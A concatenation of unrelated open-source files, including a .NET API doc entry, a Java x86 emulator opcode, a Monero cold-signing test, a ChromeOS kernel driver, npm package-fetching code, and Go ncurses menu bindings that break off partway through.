<InterfaceMember>M:System.EnterpriseServices.Internal.ISoapServerVRoot.GetVirtualRootStatus(System.String,System.String,System.String,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@)</InterfaceMember>
</Implements>
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<ReturnValue>
<ReturnType>System.Void</ReturnType>
</ReturnValue>
<Parameters>
<Parameter Name="RootWebServer" Type="System.String" />
<Parameter Name="inBaseUrl" Type="System.String" />
<Parameter Name="inVirtualRoot" Type="System.String" />
<Parameter Name="Exists" Type="System.String" RefType="out" />
<Parameter Name="SSL" Type="System.String" RefType="out" />
<Parameter Name="WindowsAuth" Type="System.String" RefType="out" />
<Parameter Name="Anonymous" Type="System.String" RefType="out" />
<Parameter Name="HomePage" Type="System.String" RefType="out" />
<Parameter Name="DiscoFile" Type="System.String" RefType="out" />
<Parameter Name="PhysicalPath" Type="System.String" RefType="out" />
<Parameter Name="BaseUrl" Type="System.String" RefType="out" />
<Parameter Name="VirtualRoot" Type="System.String" RefType="out" />
</Parameters>
<Docs>
<param name="RootWebServer">The root Web server. The default is "IIS://localhost/W3SVC/1/ROOT".</param>
<param name="inBaseUrl">The base URL that contains the virtual root.</param>
<param name="inVirtualRoot">The name of the virtual root.</param>
<param name="Exists">When this method returns, this parameter contains a <see langword="true" /> if the virtual directory exists; otherwise, <see langword="false" />.</param>
<param name="SSL">When this method returns, this parameter contains a <see langword="true" /> if SSL encryption is required; otherwise, <see langword="false" />.</param>
<param name="WindowsAuth">When this method returns, this parameter contains <see langword="true" /> if Windows authentication is set, otherwise, <see langword="false" />.</param>
<param name="Anonymous">When this method returns, this parameter contains <see langword="true" /> if no authentication is set (anonymous user); otherwise, <see langword="false" />.</param>
<param name="HomePage">When this method returns, this parameter contains a <see langword="true" /> if the Virtual Root's <see langword="EnableDefaultDoc" /> property is set; otherwise, <see langword="false" />.</param>
<param name="DiscoFile">When this method returns, this parameter contains a <see langword="true" /> if a Default.disco file exists; otherwise, <see langword="false" />.</param>
<param name="PhysicalPath">When this method returns, this parameter contains the disk address of the virtual root directory.</param>
<param name="BaseUrl">When this method returns, this parameter contains the base URL.</param>
<param name="VirtualRoot">When this method returns, this parameter contains the name of the virtual root.</param>
<summary>Returns the security status of an existing SOAP virtual root.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
</Members>
</Type>
| {
"pile_set_name": "Github"
} |
/*
JPC: An x86 PC Hardware Emulator for a pure Java Virtual Machine
Copyright (C) 2012-2013 Ian Preston
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as published by
the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
Details (including contact information) can be found at:
jpc.sourceforge.net
or the developer website
sourceforge.net/projects/jpc/
End of licence header
*/
package org.jpc.emulator.execution.opcodes.rm;
import org.jpc.emulator.execution.*;
import org.jpc.emulator.execution.decoder.*;
import org.jpc.emulator.processor.*;
import org.jpc.emulator.processor.fpu64.*;
import static org.jpc.emulator.processor.Processor.*;
public class btc_Ew_Gw_mem extends Executable
{
final Pointer op1;
final int op2Index;
public btc_Ew_Gw_mem(int blockStart, int eip, int prefices, PeekableInputStream input)
{
super(blockStart, eip);
int modrm = input.readU8();
op1 = Modrm.getPointer(prefices, modrm, input);
op2Index = Modrm.Gw(modrm);
}
public Branch execute(Processor cpu)
{
Reg op2 = cpu.regs[op2Index];
int bit = 1 << (op2.get16() & (16-1));
int offset = ((op2.get16() & ~(16-1))/8);
cpu.cf = (0 != (op1.get16(cpu, offset) & bit));
cpu.flagStatus &= NCF;
op1.set16(cpu, offset, (short)(op1.get16(cpu, offset)^bit));
return Branch.None;
}
public boolean isBranch()
{
return false;
}
public String toString()
{
return this.getClass().getName();
}
} | {
"pile_set_name": "Github"
} |
#!/usr/bin/env python3
# Copyright (c) 2019 The Monero Project
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be
# used to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Test cold tx signing
"""
from __future__ import print_function
from framework.daemon import Daemon
from framework.wallet import Wallet
class ColdSigningTest():
def run_test(self):
self.reset()
self.create(0)
self.mine()
self.transfer()
def reset(self):
print('Resetting blockchain')
daemon = Daemon()
res = daemon.get_height()
daemon.pop_blocks(res.height - 1)
daemon.flush_txpool()
def create(self, idx):
print('Creating hot and cold wallet')
self.hot_wallet = Wallet(idx = 0)
# close the wallet if any, will throw if none is loaded
try: self.hot_wallet.close_wallet()
except: pass
self.cold_wallet = Wallet(idx = 1)
# close the wallet if any, will throw if none is loaded
try: self.cold_wallet.close_wallet()
except: pass
seed = 'velvet lymph giddy number token physics poetry unquoted nibs useful sabotage limits benches lifestyle eden nitrogen anvil fewest avoid batch vials washing fences goat unquoted'
res = self.cold_wallet.restore_deterministic_wallet(seed = seed)
self.cold_wallet.set_daemon('127.0.0.1:11111', ssl_support = "disabled")
spend_key = self.cold_wallet.query_key("spend_key").key
view_key = self.cold_wallet.query_key("view_key").key
res = self.hot_wallet.generate_from_keys(viewkey = view_key, address = '42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm')
ok = False
try: res = self.hot_wallet.query_key("spend_key")
except: ok = True
assert ok
ok = False
try: self.hot_wallet.query_key("mnemonic")
except: ok = True
assert ok
assert self.cold_wallet.query_key("view_key").key == view_key
assert self.cold_wallet.get_address().address == self.hot_wallet.get_address().address
def mine(self):
print("Mining some blocks")
daemon = Daemon()
wallet = Wallet()
daemon.generateblocks('42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm', 80)
wallet.refresh()
def transfer(self):
daemon = Daemon()
print("Creating transaction in hot wallet")
dst = {'address': '42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm', 'amount': 1000000000000}
self.hot_wallet.refresh()
res = self.hot_wallet.export_outputs()
self.cold_wallet.import_outputs(res.outputs_data_hex)
res = self.cold_wallet.export_key_images(True)
self.hot_wallet.import_key_images(res.signed_key_images, offset = res.offset)
res = self.hot_wallet.transfer([dst], ring_size = 11, get_tx_key = False)
assert len(res.tx_hash) == 32*2
txid = res.tx_hash
assert len(res.tx_key) == 0
assert res.amount > 0
amount = res.amount
assert res.fee > 0
fee = res.fee
assert len(res.tx_blob) == 0
assert len(res.tx_metadata) == 0
assert len(res.multisig_txset) == 0
assert len(res.unsigned_txset) > 0
unsigned_txset = res.unsigned_txset
print('Signing transaction with cold wallet')
res = self.cold_wallet.describe_transfer(unsigned_txset = unsigned_txset)
assert len(res.desc) == 1
desc = res.desc[0]
assert desc.amount_in >= amount + fee
assert desc.amount_out == desc.amount_in - fee
assert desc.ring_size == 11
assert desc.unlock_time == 0
assert desc.payment_id in ['', '0000000000000000']
assert desc.change_amount == desc.amount_in - 1000000000000 - fee
assert desc.change_address == '42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm'
assert desc.fee == fee
assert len(desc.recipients) == 1
rec = desc.recipients[0]
assert rec.address == '42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm'
assert rec.amount == 1000000000000
res = self.cold_wallet.sign_transfer(unsigned_txset)
assert len(res.signed_txset) > 0
signed_txset = res.signed_txset
assert len(res.tx_hash_list) == 1
txid = res.tx_hash_list[0]
assert len(txid) == 64
print('Submitting transaction with hot wallet')
res = self.hot_wallet.submit_transfer(signed_txset)
assert len(res.tx_hash_list) > 0
assert res.tx_hash_list[0] == txid
res = self.hot_wallet.get_transfers()
assert len([x for x in (res['pending'] if 'pending' in res else []) if x.txid == txid]) == 1
assert len([x for x in (res['out'] if 'out' in res else []) if x.txid == txid]) == 0
daemon.generateblocks('42ey1afDFnn4886T7196doS9GPMzexD9gXpsZJDwVjeRVdFCSoHnv7KPbBeGpzJBzHRCAs9UxqeoyFQMYbqSWYTfJJQAWDm', 1)
self.hot_wallet.refresh()
res = self.hot_wallet.get_transfers()
assert len([x for x in (res['pending'] if 'pending' in res else []) if x.txid == txid]) == 0
assert len([x for x in (res['out'] if 'out' in res else []) if x.txid == txid]) == 1
res = self.hot_wallet.get_tx_key(txid)
assert len(res.tx_key) == 0 or res.tx_key == '01' + '0' * 62 # identity is used as placeholder
res = self.cold_wallet.get_tx_key(txid)
assert len(res.tx_key) == 64
class Guard:
def __enter__(self):
for i in range(2):
Wallet(idx = i).auto_refresh(False)
def __exit__(self, exc_type, exc_value, traceback):
for i in range(2):
Wallet(idx = i).auto_refresh(True)
if __name__ == '__main__':
with Guard() as guard:
cs = ColdSigningTest().run_test()
| {
"pile_set_name": "Github"
} |
op {
graph_op_name: "ExtractJpegShape"
visibility: HIDDEN
}
| {
"pile_set_name": "Github"
} |
obj-$(CONFIG_CRYPTO_DEV_SUN8I_SS) += sun8i-ss.o
sun8i-ss-y += sun8i-ss-core.o sun8i-ss-cipher.o
| {
"pile_set_name": "Github"
} |
export JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_144.jdk/Contents/Home
export BOOK_HOME=/Users/mparsian/zmp/github/data-algorithms-book
export SPARK_HOME=/Users/mparsian/spark-2.2.1
export APP_JAR=$BOOK_HOME/dist/data_algorithms_book.jar
#
# build all other dependent jars in OTHER_JARS
JARS=`find $BOOK_HOME/lib -name '*.jar' `
OTHER_JARS=""
for J in $JARS ; do
OTHER_JARS=$J,$OTHER_JARS
done
#
# define input/output for Hadoop/HDFS
SPAM_TRAINING="file://$BOOK_HOME/src/main/java/org/dataalgorithms/machinelearning/logistic/spam/resources/emails_spam.txt"
NON_SPAM_TRAINING="file://$BOOK_HOME/src/main/java/org/dataalgorithms/machinelearning/logistic/spam/resources/emails_nospam.txt"
MODEL_DIR="$BOOK_HOME/src/main/java/org/dataalgorithms/machinelearning/logistic/spam/resources/model"
MODEL="file://${MODEL_DIR}"
#
# remove any previous model output
rm -fr ${MODEL_DIR}
#
# run the Spark driver to build the model
driver=org.dataalgorithms.machinelearning.logistic.spam.EmailSpamDetectionBuildModel
$SPARK_HOME/bin/spark-submit --class $driver \
--master local \
--jars $OTHER_JARS \
--conf "spark.yarn.jar=$SPARK_JAR" \
$APP_JAR $SPAM_TRAINING $NON_SPAM_TRAINING $MODEL
| {
"pile_set_name": "Github"
} |
<component name="libraryTable">
<library name="ShareSDK-Core-2.5.4">
<CLASSES>
<root url="jar://$PROJECT_DIR$/app/libs/ShareSDK-Core-2.5.4.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component> | {
"pile_set_name": "Github"
} |
/*
* cros_ec_vbc - Expose the vboot context nvram to userspace
*
* Copyright (C) 2015 Collabora Ltd.
*
* based on vendor driver,
*
* Copyright (C) 2012 The Chromium OS Authors
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <linux/of.h>
#include <linux/platform_device.h>
#include <linux/mfd/cros_ec.h>
#include <linux/mfd/cros_ec_commands.h>
#include <linux/slab.h>
static ssize_t vboot_context_read(struct file *filp, struct kobject *kobj,
struct bin_attribute *att, char *buf,
loff_t pos, size_t count)
{
struct device *dev = container_of(kobj, struct device, kobj);
struct cros_ec_dev *ec = container_of(dev, struct cros_ec_dev,
class_dev);
struct cros_ec_device *ecdev = ec->ec_dev;
struct ec_params_vbnvcontext *params;
struct cros_ec_command *msg;
int err;
const size_t para_sz = sizeof(params->op);
const size_t resp_sz = sizeof(struct ec_response_vbnvcontext);
const size_t payload = max(para_sz, resp_sz);
msg = kmalloc(sizeof(*msg) + payload, GFP_KERNEL);
if (!msg)
return -ENOMEM;
/* NB: we only kmalloc()ated enough space for the op field */
params = (struct ec_params_vbnvcontext *)msg->data;
params->op = EC_VBNV_CONTEXT_OP_READ;
msg->version = EC_VER_VBNV_CONTEXT;
msg->command = EC_CMD_VBNV_CONTEXT;
msg->outsize = para_sz;
msg->insize = resp_sz;
err = cros_ec_cmd_xfer(ecdev, msg);
if (err < 0) {
dev_err(dev, "Error sending read request: %d\n", err);
kfree(msg);
return err;
}
memcpy(buf, msg->data, resp_sz);
kfree(msg);
return resp_sz;
}
static ssize_t vboot_context_write(struct file *filp, struct kobject *kobj,
struct bin_attribute *attr, char *buf,
loff_t pos, size_t count)
{
struct device *dev = container_of(kobj, struct device, kobj);
struct cros_ec_dev *ec = container_of(dev, struct cros_ec_dev,
class_dev);
struct cros_ec_device *ecdev = ec->ec_dev;
struct ec_params_vbnvcontext *params;
struct cros_ec_command *msg;
int err;
const size_t para_sz = sizeof(*params);
const size_t data_sz = sizeof(params->block);
/* Only write full values */
if (count != data_sz)
return -EINVAL;
msg = kmalloc(sizeof(*msg) + para_sz, GFP_KERNEL);
if (!msg)
return -ENOMEM;
params = (struct ec_params_vbnvcontext *)msg->data;
params->op = EC_VBNV_CONTEXT_OP_WRITE;
memcpy(params->block, buf, data_sz);
msg->version = EC_VER_VBNV_CONTEXT;
msg->command = EC_CMD_VBNV_CONTEXT;
msg->outsize = para_sz;
msg->insize = 0;
err = cros_ec_cmd_xfer(ecdev, msg);
if (err < 0) {
dev_err(dev, "Error sending write request: %d\n", err);
kfree(msg);
return err;
}
kfree(msg);
return data_sz;
}
static umode_t cros_ec_vbc_is_visible(struct kobject *kobj,
struct bin_attribute *a, int n)
{
struct device *dev = container_of(kobj, struct device, kobj);
struct cros_ec_dev *ec = container_of(dev, struct cros_ec_dev,
class_dev);
struct device_node *np = ec->ec_dev->dev->of_node;
if (IS_ENABLED(CONFIG_OF) && np) {
if (of_property_read_bool(np, "google,has-vbc-nvram"))
return a->attr.mode;
}
return 0;
}
static BIN_ATTR_RW(vboot_context, 16);
static struct bin_attribute *cros_ec_vbc_bin_attrs[] = {
&bin_attr_vboot_context,
NULL
};
struct attribute_group cros_ec_vbc_attr_group = {
.name = "vbc",
.bin_attrs = cros_ec_vbc_bin_attrs,
.is_bin_visible = cros_ec_vbc_is_visible,
};
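/*
 * Usage sketch (path is an assumption; the exact sysfs location depends on
 * how the parent cros_ec device registers this attribute group): the 16-byte
 * vboot context appears as a binary attribute named "vboot_context" inside a
 * "vbc" directory under the EC device's sysfs node, readable e.g. with
 *     hexdump -C .../cros_ec/vbc/vboot_context
 */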
| {
"pile_set_name": "Github"
} |
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
"use strict";
const { windows, isInteractive, isDocumentLoaded,
getOuterId, isTopLevel } = require("../window/utils");
const { InputPort } = require("./system");
const { lift, merges, foldp, keepIf, start, Input } = require("../event/utils");
const { patch } = require("diffpatcher/index");
const { on } = require("../event/core");
const { Sequence, seq, filter, object, pairs } = require("../util/sequence");
// Create lazy iterators from the regular arrays, although
// once https://github.com/mozilla/addon-sdk/pull/1314 lands
// `windows` will be transformed into lazy iterators.
// When iterated over, the sequences below will yield items representing
// the state of the windows at the time of iteration.
const opened = seq(function*() {
const items = windows(null, {includePrivates: true});
for (let item of items)
yield [getOuterId(item), item];
});
const interactive = filter(([_, window]) => isInteractive(window), opened);
const loaded = filter(([_, window]) => isDocumentLoaded(window), opened);
// Helper function that converts given argument to a delta.
const Update = window => window && object([getOuterId(window), window]);
const Delete = window => window && object([getOuterId(window), null]);
// Signal represents delta for last opened top level window.
const LastOpened = lift(Update, new InputPort({topic: "domwindowopened"}));
exports.LastOpened = LastOpened;
// Signal represents delta for last top level window close.
const LastClosed = lift(Delete, new InputPort({topic: "domwindowclosed"}));
exports.LastClosed = LastClosed;
const windowFor = document => document && document.defaultView;
// Signal represent delta for last top level window document becoming interactive.
const InteractiveDoc = new InputPort({topic: "chrome-document-interactive"});
const InteractiveWin = lift(windowFor, InteractiveDoc);
const LastInteractive = lift(Update, keepIf(isTopLevel, null, InteractiveWin));
exports.LastInteractive = LastInteractive;
// Signal represent delta for last top level window loaded.
const LoadedDoc = new InputPort({topic: "chrome-document-loaded"});
const LoadedWin = lift(windowFor, LoadedDoc);
const LastLoaded = lift(Update, keepIf(isTopLevel, null, LoadedWin));
exports.LastLoaded = LastLoaded;
const initialize = input => {
if (!input.initialized) {
input.value = object(...input.value);
Input.start(input);
input.initialized = true;
}
};
// Signal represents set of currently opened top level windows, updated
// to new set any time window is opened or closed.
const Opened = foldp(patch, opened, merges([LastOpened, LastClosed]));
Opened[start] = initialize;
exports.Opened = Opened;
// Signal represents set of top level interactive windows, updated any
// time a new window becomes interactive or one gets closed.
const Interactive = foldp(patch, interactive, merges([LastInteractive,
LastClosed]));
Interactive[start] = initialize;
exports.Interactive = Interactive;
// Signal represents set of top level loaded windows, updated any time
// a new window finishes loading or one gets closed.
const Loaded = foldp(patch, loaded, merges([LastLoaded, LastClosed]));
Loaded[start] = initialize;
exports.Loaded = Loaded;
| {
"pile_set_name": "Github"
} |
'use strict'
var fs = require('graceful-fs')
var path = require('path')
var zlib = require('zlib')
var log = require('npmlog')
var realizePackageSpecifier = require('realize-package-specifier')
var tar = require('tar')
var once = require('once')
var semver = require('semver')
var readPackageTree = require('read-package-tree')
var readPackageJson = require('read-package-json')
var iferr = require('iferr')
var rimraf = require('rimraf')
var clone = require('lodash.clonedeep')
var validate = require('aproba')
var unpipe = require('unpipe')
var normalizePackageData = require('normalize-package-data')
var npm = require('./npm.js')
var mapToRegistry = require('./utils/map-to-registry.js')
var cache = require('./cache.js')
var cachedPackageRoot = require('./cache/cached-package-root.js')
var tempFilename = require('./utils/temp-filename.js')
var getCacheStat = require('./cache/get-stat.js')
var unpack = require('./utils/tar.js').unpack
var pulseTillDone = require('./utils/pulse-till-done.js')
var parseJSON = require('./utils/parse-json.js')
function andLogAndFinish (spec, tracker, done) {
validate('SF', [spec, done])
return function (er, pkg) {
if (er) {
log.silly('fetchPackageMetaData', 'error for ' + spec, er)
if (tracker) tracker.finish()
}
return done(er, pkg)
}
}
module.exports = function fetchPackageMetadata (spec, where, tracker, done) {
if (!done) {
done = tracker || where
tracker = null
if (done === where) where = null
}
if (typeof spec === 'object') {
var dep = spec
spec = dep.raw
}
var logAndFinish = andLogAndFinish(spec, tracker, done)
if (!dep) {
log.silly('fetchPackageMetaData', spec)
return realizePackageSpecifier(spec, where, iferr(logAndFinish, function (dep) {
fetchPackageMetadata(dep, where, tracker, done)
}))
}
if (dep.type === 'version' || dep.type === 'range' || dep.type === 'tag') {
fetchNamedPackageData(dep, addRequestedAndFinish)
} else if (dep.type === 'directory') {
fetchDirectoryPackageData(dep, where, addRequestedAndFinish)
} else {
fetchOtherPackageData(spec, dep, where, addRequestedAndFinish)
}
function addRequestedAndFinish (er, pkg) {
if (pkg) {
pkg._requested = dep
pkg._spec = spec
pkg._where = where
if (!pkg._args) pkg._args = []
pkg._args.push([pkg._spec, pkg._where])
// non-npm registries can and will return unnormalized data, plus
// even the npm registry may have package data normalized with older
// normalization rules. This ensures we get package data in a consistent,
// stable format.
try {
normalizePackageData(pkg)
} catch (ex) {
// don't care
}
}
logAndFinish(er, pkg)
}
}
function fetchOtherPackageData (spec, dep, where, next) {
validate('SOSF', arguments)
log.silly('fetchOtherPackageData', spec)
cache.add(spec, null, where, false, iferr(next, function (pkg) {
var result = clone(pkg)
result._inCache = true
next(null, result)
}))
}
function fetchDirectoryPackageData (dep, where, next) {
validate('OSF', arguments)
log.silly('fetchDirectoryPackageData', dep.name || dep.rawSpec)
readPackageJson(path.join(dep.spec, 'package.json'), false, next)
}
var regCache = {}
function fetchNamedPackageData (dep, next) {
validate('OF', arguments)
log.silly('fetchNamedPackageData', dep.name || dep.rawSpec)
mapToRegistry(dep.name || dep.rawSpec, npm.config, iferr(next, function (url, auth) {
if (regCache[url]) {
pickVersionFromRegistryDocument(clone(regCache[url]))
} else {
npm.registry.get(url, {auth: auth}, pulseTillDone('fetchMetadata', iferr(next, pickVersionFromRegistryDocument)))
}
function returnAndAddMetadata (pkg) {
delete pkg._from
delete pkg._resolved
delete pkg._shasum
next(null, pkg)
}
function pickVersionFromRegistryDocument (pkg) {
if (!regCache[url]) regCache[url] = pkg
var versions = Object.keys(pkg.versions).sort(semver.rcompare)
if (dep.type === 'tag') {
var tagVersion = pkg['dist-tags'][dep.spec]
if (pkg.versions[tagVersion]) return returnAndAddMetadata(pkg.versions[tagVersion])
} else {
var latestVersion = pkg['dist-tags'][npm.config.get('tag')] || versions[0]
// Find the most recent version less than or equal
// to latestVersion that satisfies our spec
for (var ii = 0; ii < versions.length; ++ii) {
if (semver.gt(versions[ii], latestVersion)) continue
if (semver.satisfies(versions[ii], dep.spec)) {
return returnAndAddMetadata(pkg.versions[versions[ii]])
}
}
// Failing that, try finding the most recent version that matches
// our spec
for (var jj = 0; jj < versions.length; ++jj) {
if (semver.satisfies(versions[jj], dep.spec)) {
return returnAndAddMetadata(pkg.versions[versions[jj]])
}
}
// Failing THAT, if the range was '*' uses latestVersion
if (dep.spec === '*') {
return returnAndAddMetadata(pkg.versions[latestVersion])
}
}
// And failing that, we error out
var targets = versions.length
? 'Valid install targets:\n' + versions.join(', ') + '\n'
: 'No valid targets found.'
var er = new Error('No compatible version found: ' +
dep.raw + '\n' + targets)
return next(er)
}
}))
}
function retryWithCached (pkg, asserter, next) {
if (!pkg._inCache) {
cache.add(pkg._spec, null, pkg._where, false, iferr(next, function (newpkg) {
Object.keys(newpkg).forEach(function (key) {
if (key[0] !== '_') return
pkg[key] = newpkg[key]
})
pkg._inCache = true
return asserter(pkg, next)
}))
}
return !pkg._inCache
}
module.exports.addShrinkwrap = function addShrinkwrap (pkg, next) {
validate('OF', arguments)
if (pkg._shrinkwrap !== undefined) return next(null, pkg)
if (retryWithCached(pkg, addShrinkwrap, next)) return
pkg._shrinkwrap = null
// FIXME: cache the shrinkwrap directly
var pkgname = pkg.name
var ver = pkg.version
var tarball = path.join(cachedPackageRoot({name: pkgname, version: ver}), 'package.tgz')
untarStream(tarball, function (er, untar) {
if (er) {
if (er.code === 'ENOTTARBALL') {
pkg._shrinkwrap = null
return next()
} else {
return next(er)
}
}
if (er) return next(er)
var foundShrinkwrap = false
untar.on('entry', function (entry) {
if (!/^(?:[^\/]+[\/])npm-shrinkwrap.json$/.test(entry.path)) return
log.silly('addShrinkwrap', 'Found shrinkwrap in ' + pkgname + ' ' + entry.path)
foundShrinkwrap = true
var shrinkwrap = ''
entry.on('data', function (chunk) {
shrinkwrap += chunk
})
entry.on('end', function () {
untar.close()
log.silly('addShrinkwrap', 'Completed reading shrinkwrap in ' + pkgname)
try {
pkg._shrinkwrap = parseJSON(shrinkwrap)
} catch (ex) {
var er = new Error('Error parsing ' + pkgname + '@' + ver + "'s npm-shrinkwrap.json: " + ex.message)
er.type = 'ESHRINKWRAP'
return next(er)
}
next(null, pkg)
})
entry.resume()
})
untar.on('end', function () {
if (!foundShrinkwrap) {
pkg._shrinkwrap = null
next(null, pkg)
}
})
})
}
module.exports.addBundled = function addBundled (pkg, next) {
validate('OF', arguments)
if (pkg._bundled !== undefined) return next(null, pkg)
if (!pkg.bundleDependencies) return next(null, pkg)
if (retryWithCached(pkg, addBundled, next)) return
pkg._bundled = null
var pkgname = pkg.name
var ver = pkg.version
var tarball = path.join(cachedPackageRoot({name: pkgname, version: ver}), 'package.tgz')
var target = tempFilename('unpack')
getCacheStat(iferr(next, function (cs) {
log.verbose('addBundled', 'extract', tarball)
unpack(tarball, target, null, null, cs.uid, cs.gid, iferr(next, function () {
log.silly('addBundled', 'read tarball')
readPackageTree(target, function (er, tree) {
log.silly('cleanup', 'remove extracted module')
rimraf(target, function () {
if (tree) {
pkg._bundled = tree.children
}
next(null, pkg)
})
})
}))
}))
}
// FIXME: hasGzipHeader / hasTarHeader / untarStream duplicate a lot
// of code from lib/utils/tar.js; these should be brought together.
function hasGzipHeader (c) {
return c[0] === 0x1F && c[1] === 0x8B && c[2] === 0x08
}
function hasTarHeader (c) {
return c[257] === 0x75 && // tar archives have 7573746172 at position
c[258] === 0x73 && // 257 and 003030 or 202000 at position 262
c[259] === 0x74 &&
c[260] === 0x61 &&
c[261] === 0x72 &&
((c[262] === 0x00 &&
c[263] === 0x30 &&
c[264] === 0x30) ||
(c[262] === 0x20 &&
c[263] === 0x20 &&
c[264] === 0x00))
}
function untarStream (tarball, cb) {
validate('SF', arguments)
cb = once(cb)
var stream
var file = stream = fs.createReadStream(tarball)
var tounpipe = [file]
file.on('error', function (er) {
er = new Error('Error extracting ' + tarball + ' archive: ' + er.message)
er.code = 'EREADFILE'
cb(er)
})
file.on('data', function OD (c) {
if (hasGzipHeader(c)) {
doGunzip()
} else if (hasTarHeader(c)) {
doUntar()
} else {
if (file.close) file.close()
if (file.destroy) file.destroy()
var er = new Error('Non-gzip/tarball ' + tarball)
er.code = 'ENOTTARBALL'
return cb(er)
}
file.removeListener('data', OD)
file.emit('data', c)
cb(null, stream)
})
function doGunzip () {
var gunzip = stream.pipe(zlib.createGunzip())
gunzip.on('error', function (er) {
er = new Error('Error extracting ' + tarball + ' archive: ' + er.message)
er.code = 'EGUNZIP'
cb(er)
})
tounpipe.push(gunzip)
stream = gunzip
doUntar()
}
function doUntar () {
var untar = stream.pipe(tar.Parse())
untar.on('error', function (er) {
er = new Error('Error extracting ' + tarball + ' archive: ' + er.message)
er.code = 'EUNTAR'
cb(er)
})
tounpipe.push(untar)
stream = untar
addClose()
}
function addClose () {
stream.close = function () {
tounpipe.forEach(function (stream) {
unpipe(stream)
})
if (file.close) file.close()
if (file.destroy) file.destroy()
}
}
}
| {
"pile_set_name": "Github"
} |
package menus
// #define _Bool int
// #include <menu.h>
// #cgo LDFLAGS: -lmenu -lncurses
import "C"
import (
. "github.com/mpatraw/gocurse/curses"
"unsafe"
)
type Text C.TEXT
type Item C.ITEM
type Menu C.MENU
type ItemOptions C.Item_Options
type MenuOptions C.Menu_Options
const (
O_ONEVALUE = C.O_ONEVALUE
O_SHOWDESC = C.O_SHOWDESC
O_ROWMAJOR = C.O_ROWMAJOR
O_IGNORECASE = C.O_IGNORECASE
O_SHOWMATCH = C.O_SHOWMATCH
O_NONCYCLIC = C.O_NONCYCLIC
O_SELECTABLE = C.O_SELECTABLE
REQ_LEFT_ITEM = C.REQ_LEFT_ITEM
REQ_RIGHT_ITEM = C.REQ_RIGHT_ITEM
REQ_UP_ITEM = C.REQ_UP_ITEM
REQ_DOWN_ITEM = C.REQ_DOWN_ITEM
REQ_SCR_ULINE = C.REQ_SCR_ULINE
REQ_SCR_DLINE = C.REQ_SCR_DLINE
REQ_SCR_DPAGE = C.REQ_SCR_DPAGE
REQ_SCR_UPAGE = C.REQ_SCR_UPAGE
REQ_FIRST_ITEM = C.REQ_FIRST_ITEM
REQ_LAST_ITEM = C.REQ_LAST_ITEM
REQ_NEXT_ITEM = C.REQ_NEXT_ITEM
REQ_PREV_ITEM = C.REQ_PREV_ITEM
REQ_TOGGLE_ITEM = C.REQ_TOGGLE_ITEM
REQ_CLEAR_PATTERN = C.REQ_CLEAR_PATTERN
REQ_BACK_PATTERN = C.REQ_BACK_PATTERN
REQ_NEXT_MATCH = C.REQ_NEXT_MATCH
REQ_PREV_MATCH = C.REQ_PREV_MATCH
MIN_MENU_COMMAND = C.MIN_MENU_COMMAND
